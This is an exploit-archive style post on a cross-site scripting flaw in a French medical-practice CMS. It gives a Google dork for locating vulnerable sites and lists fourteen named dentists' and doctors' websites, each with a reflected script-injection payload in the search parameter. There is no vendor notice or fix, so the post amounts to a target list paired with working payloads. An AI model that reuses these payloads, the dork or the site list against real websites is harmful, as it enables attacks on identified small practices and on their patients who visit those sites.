######################
# Exploit Title : French doctors cms cross site scripting
# Exploit Author : Ashiyane Digital Security Team
# Google Dork : intext:"Mentions légales" inurl:"recherche.php?recherche="
# Date: 01-12-2016
# Tested On : windows 7 /firefox
######################
#http://www.dr-meynier-pascal.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.cabinetborbarriere.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-berenguer-christophe.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-salama-jean-pierre.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-lamouret-benoit.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-dadoun-hubert.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-pradelle-xavier.chirurgiens-dentistes.fr/recherche.php?recherche=><script>alert(/XSS/)</script>
#http://www.dr-haffani-slim.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-jamous-antoine.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://docteurmaxboukris.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.docteurdanan.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-guiss-herve.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.cabinet-carrefour-europe.com/recherche.php?recherche="><script>alert(/XSS/)</script>
#http://www.dr-soissong-netzer-audrey.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>